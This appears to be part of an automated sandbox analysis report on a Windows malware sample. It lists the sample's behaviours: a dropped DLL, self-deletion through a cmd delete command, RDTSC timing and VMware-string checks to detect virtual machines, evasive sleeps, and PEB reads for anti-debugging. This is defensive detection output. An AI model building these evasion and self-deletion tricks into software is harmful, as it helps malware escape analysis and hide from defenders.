Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0057B87C push eax; ret 7_2_0057B882
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0057B812 push eax; ret 7_2_0057B818
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0057B81B push eax; ret 7_2_0057B882
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_005772E9 push edx; retf 7_2_005772EE
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_00578AE8 push ds; retf 7_2_00578AED
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0057B7C5 push eax; ret 7_2_0057B818
Source: initial sample Static PE information: section name: .data entropy: 7.77743167322

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\Desktop\DN_467842234567.exe File created: C:\Users\user\AppData\Local\Temp\nslF1C.tmp\rcgwzvp.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Self deletion via cmd delete
Source: C:\Windows\SysWOW64\WWAHost.exe Process created: /c del 'C:\Users\user\Desktop\DN_467842234567.exe'
Source: C:\Windows\SysWOW64\WWAHost.exe Process created: /c del 'C:\Users\user\Desktop\DN_467842234567.exe' Jump to behavior
Source: C:\Users\user\Desktop\DN_467842234567.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\DN_467842234567.exe RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DN_467842234567.exe RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\WWAHost.exe RDTSC instruction interceptor: First address: 00000000005685F4 second address: 00000000005685FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\WWAHost.exe RDTSC instruction interceptor: First address: 000000000056898E second address: 0000000000568994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 5152 Thread sleep time: -55000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe TID: 7076 Thread sleep time: -46000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\WWAHost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\WWAHost.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_004088C0 rdtsc 1_2_004088C0
Source: C:\Users\user\Desktop\DN_467842234567.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_00405EC2 FindFirstFileA,FindClose, 0_2_00405EC2
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_004054EC
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_00402671 FindFirstFileA, 0_2_00402671
Source: explorer.exe, 00000004.00000000.718727163.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.715398988.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.718727163.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.700136697.000000000A716000.00000004.00000001.sdmp Binary or memory string: War&Prod_VMware_SATAa
Source: explorer.exe, 00000004.00000000.692764145.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000004.00000000.700657795.000000000A897000.00000004.00000001.sdmp Binary or memory string: 6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}WW
Source: explorer.exe, 00000004.00000000.700657795.000000000A897000.00000004.00000001.sdmp Binary or memory string: #{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir
Source: explorer.exe, 00000004.00000000.700136697.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000004.00000000.700136697.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@

Anti Debugging:

barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_004088C0 rdtsc 1_2_004088C0
Enables debug privileges
Source: C:\Users\user\Desktop\DN_467842234567.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_729156EA mov eax, dword ptr fs:[00000030h] 0_2_729156EA
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_729159AF mov eax, dword ptr fs:[00000030h] 0_2_729159AF
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_729158FE mov eax, dword ptr fs:[00000030h] 0_2_729158FE
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_729159EE mov eax, dword ptr fs:[00000030h] 0_2_729159EE
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_72915A2C mov eax, dword ptr fs:[00000030h] 0_2_72915A2C
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BBF0BF mov ecx, dword ptr fs:[00000030h] 1_2_00BBF0BF
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BBF0BF mov eax, dword ptr fs:[00000030h] 1_2_00BBF0BF
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BBF0BF mov eax, dword ptr fs:[00000030h] 1_2_00BBF0BF
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C1B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00C1B8D0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C1B8D0 mov ecx, dword ptr fs:[00000030h] 1_2_00C1B8D0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C1B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00C1B8D0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C1B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00C1B8D0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C1B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00C1B8D0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C1B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00C1B8D0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC90AF mov eax, dword ptr fs:[00000030h] 1_2_00BC90AF
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB20A0 mov eax, dword ptr fs:[00000030h] 1_2_00BB20A0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB20A0 mov eax, dword ptr fs:[00000030h] 1_2_00BB20A0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB20A0 mov eax, dword ptr fs:[00000030h] 1_2_00BB20A0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB20A0 mov eax, dword ptr fs:[00000030h] 1_2_00BB20A0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB20A0 mov eax, dword ptr fs:[00000030h] 1_2_00BB20A0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB20A0 mov eax, dword ptr fs:[00000030h] 1_2_00BB20A0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B89080 mov eax, dword ptr fs:[00000030h] 1_2_00B89080
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C03884 mov eax, dword ptr fs:[00000030h] 1_2_00C03884
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C03884 mov eax, dword ptr fs:[00000030h] 1_2_00C03884
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B858EC mov eax, dword ptr fs:[00000030h] 1_2_00B858EC
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B9B02A mov eax, dword ptr fs:[00000030h] 1_2_00B9B02A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B9B02A mov eax, dword ptr fs:[00000030h] 1_2_00B9B02A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B9B02A mov eax, dword ptr fs:[00000030h] 1_2_00B9B02A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B9B02A mov eax, dword ptr fs:[00000030h] 1_2_00B9B02A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB002D mov eax, dword ptr fs:[00000030h] 1_2_00BB002D
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB002D mov eax, dword ptr fs:[00000030h] 1_2_00BB002D
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB002D mov eax, dword ptr fs:[00000030h] 1_2_00BB002D
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB002D mov eax, dword ptr fs:[00000030h] 1_2_00BB002D
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB002D mov eax, dword ptr fs:[00000030h] 1_2_00BB002D
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C51074 mov eax, dword ptr fs:[00000030h] 1_2_00C51074
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C42073 mov eax, dword ptr fs:[00000030h] 1_2_00C42073
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C54015 mov eax, dword ptr fs:[00000030h] 1_2_00C54015
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C54015 mov eax, dword ptr fs:[00000030h] 1_2_00C54015
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C07016 mov eax, dword ptr fs:[00000030h] 1_2_00C07016
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C07016 mov eax, dword ptr fs:[00000030h] 1_2_00C07016
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C07016 mov eax, dword ptr fs:[00000030h] 1_2_00C07016
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BA0050 mov eax, dword ptr fs:[00000030h] 1_2_00BA0050
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BA0050 mov eax, dword ptr fs:[00000030h] 1_2_00BA0050
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB61A0 mov eax, dword ptr fs:[00000030h] 1_2_00BB61A0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB61A0 mov eax, dword ptr fs:[00000030h] 1_2_00BB61A0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C141E8 mov eax, dword ptr fs:[00000030h] 1_2_00C141E8
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB2990 mov eax, dword ptr fs:[00000030h] 1_2_00BB2990
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BAC182 mov eax, dword ptr fs:[00000030h] 1_2_00BAC182
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BBA185 mov eax, dword ptr fs:[00000030h] 1_2_00BBA185
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B8B1E1 mov eax, dword ptr fs:[00000030h] 1_2_00B8B1E1
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B8B1E1 mov eax, dword ptr fs:[00000030h] 1_2_00B8B1E1
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B8B1E1 mov eax, dword ptr fs:[00000030h] 1_2_00B8B1E1
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C069A6 mov eax, dword ptr fs:[00000030h] 1_2_00C069A6
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C051BE mov eax, dword ptr fs:[00000030h] 1_2_00C051BE
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C051BE mov eax, dword ptr fs:[00000030h] 1_2_00C051BE
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C051BE mov eax, dword ptr fs:[00000030h] 1_2_00C051BE
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C051BE mov eax, dword ptr fs:[00000030h] 1_2_00C051BE
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB513A mov eax, dword ptr fs:[00000030h] 1_2_00BB513A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB513A mov eax, dword ptr fs:[00000030h] 1_2_00BB513A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BA4120 mov eax, dword ptr fs:[00000030h] 1_2_00BA4120
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BA4120 mov eax, dword ptr fs:[00000030h] 1_2_00BA4120
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BA4120 mov eax, dword ptr fs:[00000030h] 1_2_00BA4120
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BA4120 mov eax, dword ptr fs:[00000030h] 1_2_00BA4120
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BA4120 mov ecx, dword ptr fs:[00000030h] 1_2_00BA4120
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B89100 mov eax, dword ptr fs:[00000030h] 1_2_00B89100
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B89100 mov eax, dword ptr fs:[00000030h] 1_2_00B89100
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B89100 mov eax, dword ptr fs:[00000030h] 1_2_00B89100
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B8B171 mov eax, dword ptr fs:[00000030h] 1_2_00B8B171
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B8B171 mov eax, dword ptr fs:[00000030h] 1_2_00B8B171
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B8C962 mov eax, dword ptr fs:[00000030h] 1_2_00B8C962
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BAB944 mov eax, dword ptr fs:[00000030h] 1_2_00BAB944
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BAB944 mov eax, dword ptr fs:[00000030h] 1_2_00BAB944
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B9AAB0 mov eax, dword ptr fs:[00000030h] 1_2_00B9AAB0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B9AAB0 mov eax, dword ptr fs:[00000030h] 1_2_00B9AAB0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BBFAB0 mov eax, dword ptr fs:[00000030h] 1_2_00BBFAB0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B852A5 mov eax, dword ptr fs:[00000030h] 1_2_00B852A5
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B852A5 mov eax, dword ptr fs:[00000030h] 1_2_00B852A5
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B852A5 mov eax, dword ptr fs:[00000030h] 1_2_00B852A5
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B852A5 mov eax, dword ptr fs:[00000030h] 1_2_00B852A5
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B852A5 mov eax, dword ptr fs:[00000030h] 1_2_00B852A5
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BBD294 mov eax, dword ptr fs:[00000030h] 1_2_00BBD294
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BBD294 mov eax, dword ptr fs:[00000030h] 1_2_00BBD294
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB2AE4 mov eax, dword ptr fs:[00000030h] 1_2_00BB2AE4
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB2ACB mov eax, dword ptr fs:[00000030h] 1_2_00BB2ACB
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC4A2C mov eax, dword ptr fs:[00000030h] 1_2_00BC4A2C
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC4A2C mov eax, dword ptr fs:[00000030h] 1_2_00BC4A2C
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C4EA55 mov eax, dword ptr fs:[00000030h] 1_2_00C4EA55
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C14257 mov eax, dword ptr fs:[00000030h] 1_2_00C14257
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C3B260 mov eax, dword ptr fs:[00000030h] 1_2_00C3B260
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C3B260 mov eax, dword ptr fs:[00000030h] 1_2_00C3B260
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BA3A1C mov eax, dword ptr fs:[00000030h] 1_2_00BA3A1C
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C58A62 mov eax, dword ptr fs:[00000030h] 1_2_00C58A62
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B85210 mov eax, dword ptr fs:[00000030h] 1_2_00B85210
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B85210 mov ecx, dword ptr fs:[00000030h] 1_2_00B85210
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B85210 mov eax, dword ptr fs:[00000030h] 1_2_00B85210
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B85210 mov eax, dword ptr fs:[00000030h] 1_2_00B85210
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B8AA16 mov eax, dword ptr fs:[00000030h] 1_2_00B8AA16
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B8AA16 mov eax, dword ptr fs:[00000030h] 1_2_00B8AA16
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B98A0A mov eax, dword ptr fs:[00000030h] 1_2_00B98A0A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC927A mov eax, dword ptr fs:[00000030h] 1_2_00BC927A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C4AA16 mov eax, dword ptr fs:[00000030h] 1_2_00C4AA16
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C4AA16 mov eax, dword ptr fs:[00000030h] 1_2_00C4AA16
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B89240 mov eax, dword ptr fs:[00000030h] 1_2_00B89240
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B89240 mov eax, dword ptr fs:[00000030h] 1_2_00B89240
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B89240 mov eax, dword ptr fs:[00000030h] 1_2_00B89240
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B89240 mov eax, dword ptr fs:[00000030h] 1_2_00B89240
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C053CA mov eax, dword ptr fs:[00000030h] 1_2_00C053CA
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C053CA mov eax, dword ptr fs:[00000030h] 1_2_00C053CA
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB4BAD mov eax, dword ptr fs:[00000030h] 1_2_00BB4BAD
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB4BAD mov eax, dword ptr fs:[00000030h] 1_2_00BB4BAD
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB4BAD mov eax, dword ptr fs:[00000030h] 1_2_00BB4BAD
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BBB390 mov eax, dword ptr fs:[00000030h] 1_2_00BBB390
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB2397 mov eax, dword ptr fs:[00000030h] 1_2_00BB2397
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B91B8F mov eax, dword ptr fs:[00000030h] 1_2_00B91B8F
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B91B8F mov eax, dword ptr fs:[00000030h] 1_2_00B91B8F
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C3D380 mov ecx, dword ptr fs:[00000030h] 1_2_00C3D380
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C4138A mov eax, dword ptr fs:[00000030h] 1_2_00C4138A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BADBE9 mov eax, dword ptr fs:[00000030h] 1_2_00BADBE9
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB03E2 mov eax, dword ptr fs:[00000030h] 1_2_00BB03E2
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB03E2 mov eax, dword ptr fs:[00000030h] 1_2_00BB03E2
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB03E2 mov eax, dword ptr fs:[00000030h] 1_2_00BB03E2
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB03E2 mov eax, dword ptr fs:[00000030h] 1_2_00BB03E2
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB03E2 mov eax, dword ptr fs:[00000030h] 1_2_00BB03E2
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB03E2 mov eax, dword ptr fs:[00000030h] 1_2_00BB03E2
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C55BA5 mov eax, dword ptr fs:[00000030h] 1_2_00C55BA5
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C58B58 mov eax, dword ptr fs:[00000030h] 1_2_00C58B58
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB3B7A mov eax, dword ptr fs:[00000030h] 1_2_00BB3B7A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB3B7A mov eax, dword ptr fs:[00000030h] 1_2_00BB3B7A
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B8DB60 mov ecx, dword ptr fs:[00000030h] 1_2_00B8DB60
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C4131B mov eax, dword ptr fs:[00000030h] 1_2_00C4131B
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B8F358 mov eax, dword ptr fs:[00000030h] 1_2_00B8F358
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B8DB40 mov eax, dword ptr fs:[00000030h] 1_2_00B8DB40
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C58CD6 mov eax, dword ptr fs:[00000030h] 1_2_00C58CD6
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B9849B mov eax, dword ptr fs:[00000030h] 1_2_00B9849B
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06CF0 mov eax, dword ptr fs:[00000030h] 1_2_00C06CF0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06CF0 mov eax, dword ptr fs:[00000030h] 1_2_00C06CF0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06CF0 mov eax, dword ptr fs:[00000030h] 1_2_00C06CF0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C414FB mov eax, dword ptr fs:[00000030h] 1_2_00C414FB
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C1C450 mov eax, dword ptr fs:[00000030h] 1_2_00C1C450
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C1C450 mov eax, dword ptr fs:[00000030h] 1_2_00C1C450
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BBBC2C mov eax, dword ptr fs:[00000030h] 1_2_00BBBC2C
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h] 1_2_00C41C06
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h] 1_2_00C41C06
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h] 1_2_00C41C06
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h] 1_2_00C41C06
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h] 1_2_00C41C06
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h] 1_2_00C41C06
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h] 1_2_00C41C06
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h] 1_2_00C41C06
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h] 1_2_00C41C06
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h] 1_2_00C41C06
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h] 1_2_00C41C06
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h] 1_2_00C41C06
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h] 1_2_00C41C06
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h] 1_2_00C41C06
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C5740D mov eax, dword ptr fs:[00000030h] 1_2_00C5740D
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C5740D mov eax, dword ptr fs:[00000030h] 1_2_00C5740D
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C5740D mov eax, dword ptr fs:[00000030h] 1_2_00C5740D
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06C0A mov eax, dword ptr fs:[00000030h] 1_2_00C06C0A
